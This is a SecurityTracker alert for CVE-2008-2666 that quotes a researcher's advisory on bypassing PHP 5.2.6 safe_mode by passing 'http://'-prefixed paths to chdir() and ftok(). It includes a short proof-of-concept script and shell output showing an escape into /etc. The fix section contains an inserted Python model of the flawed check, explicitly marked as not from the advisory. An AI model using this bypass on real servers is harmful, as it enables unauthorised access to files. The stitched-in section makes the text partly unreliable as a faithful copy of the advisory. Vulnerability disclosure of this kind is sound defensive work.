SecurityTracker.com
Category:   Application (Generic)  >   PHP Vendors:   PHP Group
PHP File and Directory Function safe_mode Restrictions Can Be Bypassed With 'http://' Prefix
SecurityTracker Alert ID:  1020328
SecurityTracker URL:  http://securitytracker.com/id/1020328
CVE Reference:   CVE-2008-2666   (Links to External Site)
Date:  Jun 19 2008
Impact:   Disclosure of system information, Disclosure of user information, Modification of system information, Modification of user information
Exploit Included:  Yes  
Version(s): 5.2.6
Description:   A vulnerability was reported in PHP. A user can bypass safe_mode restrictions.

A user can supply a specially crafted value to various file and directory functions, including the chdir() and ftok() functions, to bypass safe_mode restrictions. A value beginning with the 'http://' prefix triggers the flaw.

Other functions are affected.

Maksymilian Arciemowicz (cXIb8O3) of SecurityReason.com reported this vulnerability.

Impact:   A user can bypass safe_mode restrictions.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.php.net/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] PHP 5.2.6 chdir(),


[PHP 5.2.6 chdir(),ftok() (standard ext) safe_mode bypass ]

Author: Maksymilian Arciemowicz (cXIb8O3)
securityreason.com
Date:
- Written: 10.05.2008
- Public: 17.06.2008

SecurityReason Research
SecurityAlert Id: 55

CVE: CVE-2008-2666
CWE: CWE-264
SecurityRisk: Medium

Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/55
Vendor: http://www.php.net

--- 0. Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

chdir - Change directory

SYNOPSIS:

bool chdir  ( string $directory  )

http://pl.php.net/manual/en/function.chdir.php


ftok - Convert a pathname and a project identifier to a System V IPC key

SYNOPSIS:

int ftok  ( string $pathname  , string $proj  )

http://pl.php.net/manual/en/function.ftok.php

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 1. chdir(), ftok() (from standard ext) and more safe_mode bypass ---
Let's look at the chdir() function:

---
PHP_FUNCTION(chdir)
{
	char *str;
	int ret, str_len;
	
	if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s", &str, &str_len) == FAILURE) {
		RETURN_FALSE;
	}

	if ((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC)) {
		RETURN_FALSE;
	}
	ret = VCWD_CHDIR(str);
	
	if (ret != 0) {
		php_error_docref(NULL TSRMLS_CC, E_WARNING, "%s (errno %d)", strerror(errno), errno);
		RETURN_FALSE;
	}

	RETURN_TRUE;
}
---

str is checked by safe_mode. Example:

---
Warning: chdir(): SAFE MODE Restriction in effect.  The script whose uid is 80 is not allowed to access / owned by uid 0 in /www/mb/mb.php on line 8
---

In the current directory, create a subdirectory named "http:". Then chdir("http://../../../../../../") succeeds and we are in /.

Why?

TRUE==((PG(safe_mode) && !php_checkuid(str, NULL, CHECKUID_CHECK_FILE_AND_DIR)) || php_check_open_basedir(str TSRMLS_CC))

for
str="http://../../../../../../"

safe_mode will ignore all paths with http://

The same situation applies to the ftok() function (and more).

---EXAMPLE1---
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("/etc/");
echo getcwd()."\n";
?>
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  62 Jun 17 17:14 /www/wufff.php
cxib# php /www/wufff.php
/www

Warning: chdir(): SAFE MODE Restriction in effect.  The script whose uid is 80 is not allowed to access /etc/ owned by uid 0 in /www/wufff.php on line 3
/www
cxib#
---/EXAMPLE1---

---EXAMPLE2---
cxib# ls -la /www/wufff.php
-rw-r--r--  1 www  www  74 Jun 17 17:13 /www/wufff.php
cxib# ls -la /www/http:
total 8
drwxr-xr-x   2 www  www   512 Jun 17 17:12 .
drwxr-xr-x  19 www  www  4608 Jun 17 17:13 ..
cxib# cat /www/wufff.php
<?
echo getcwd()."\n";
chdir("http://../../etc/");
echo getcwd()."\n";
?>
cxib# php /www/wufff.php
/www
/etc
cxib#
---/EXAMPLE2---

!!! WARNING !!!
IT IS POSSIBLE TO EXPLOIT MORE FUNCTIONS WITH http: PREFIX. SECURITYREASON WILL NOT LIST ALL VULNERABLE FUNCTIONS

--- 2. How to fix ---
Do not rely on safe_mode as your main safety mechanism.
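The mismatch explained in section 1 and the advice in section 2, modelled as an added example (constructed here, not code from the advisory or from PHP): a check that waves through anything that looks like a URL, beside one that canonicalises exactly what the syscall will receive. The function names and the /www layout are assumptions; the model works on path strings only, so symlinks are out of scope.

```python
import posixpath

# Constructed model of the two checks; no real filesystem is touched,
# so symlinks are not covered (a real check would also use realpath()).


def resolve_as_kernel_sees_it(cwd: str, path: str) -> str:
    """What chdir(2) does with the argument: a string not starting with
    '/' is relative to cwd, 'http:' is just a directory name, '//'
    collapses, and '..' climbs out."""
    return posixpath.normpath(posixpath.join(cwd, path))


def inside_root(resolved: str, root: str) -> bool:
    """Prefix test that does not let '/wwwx' pass for root '/www'."""
    root = posixpath.normpath(root)
    return resolved == root or resolved.startswith(root + "/")


def flawed_check(cwd: str, path: str, root: str) -> bool:
    """Models the bypass: a path that looks like a URL is assumed to be
    handled by a stream wrapper and skips the path check, although
    chdir() never consults wrappers and passes the string to the OS."""
    if "://" in path:
        return True
    return inside_root(resolve_as_kernel_sees_it(cwd, path), root)


def hardened_check(cwd: str, path: str, root: str) -> bool:
    """Canonicalise exactly what the syscall will receive, then compare
    against the allowed root; no special-casing on how the string looks."""
    return inside_root(resolve_as_kernel_sees_it(cwd, path), root)


def demo(cwd: str = "/www", root: str = "/www") -> dict:
    """Return {path: (flawed_allows, hardened_allows)} for the advisory's
    inputs plus a legitimate directory that happens to be named 'http:'."""
    cases = ["/etc/", "http://../../etc/", "http://sub"]
    return {p: (flawed_check(cwd, p, root), hardened_check(cwd, p, root))
            for p in cases}


if __name__ == "__main__":
    for path, (flawed, hardened) in demo().items():
        print(f"{path!r:22} flawed={flawed!s:5} hardened={hardened}")
```

The hardened variant still allows a real subdirectory named "http:" under /www, so the fix is not "reject anything containing ://" but "check the path the OS will actually resolve".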

--- 3. Greets ---
sp3x Infospec schain p_e_a Chujwamwdupe

--- 4. Contact ---
Author: SecurityReason [ Maksymilian Arciemowicz ( cXIb8O3 ) ]
Email: cxib [at] securityreason [dot] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
